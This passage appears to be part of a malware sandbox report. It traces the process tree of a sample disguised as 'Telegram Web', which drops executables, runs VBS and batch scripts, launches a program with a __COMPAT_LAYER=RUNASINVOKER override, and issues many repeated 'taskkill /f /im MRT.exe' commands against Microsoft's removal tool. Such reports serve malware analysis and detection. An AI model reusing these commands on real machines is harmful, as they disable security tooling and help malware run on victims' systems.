        
        "C:\Users\Admin\AppData\Local\Temp\Comms.exe"
        5⤵
        Executes dropped EXE
        
        PID:2796
    - - C:\Users\Admin\AppData\Local\Temp\Telegram Web.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Telegram Web.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:852
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Telegram Web\Nylevoi.vbs"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2248
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4560
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Polylyahi.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4028
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:3684
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4576
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5B69.tmp\5B6A.bat "C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe""
        10⤵
        
        PID:4860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5220
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5780
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5248
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5132
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5464
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3156
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2728
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5272
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6008
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:6072
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:1092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:1768
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5676
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5768
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5696
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1464
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6072
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3632
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5288
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5312
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5656
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5736
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5728
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:960
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6060
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5996
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5324
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4236
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5700
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5588
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5968
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3632
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4288
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3696
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3656
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4736
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5640
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5988
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3416
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2188
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5700
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
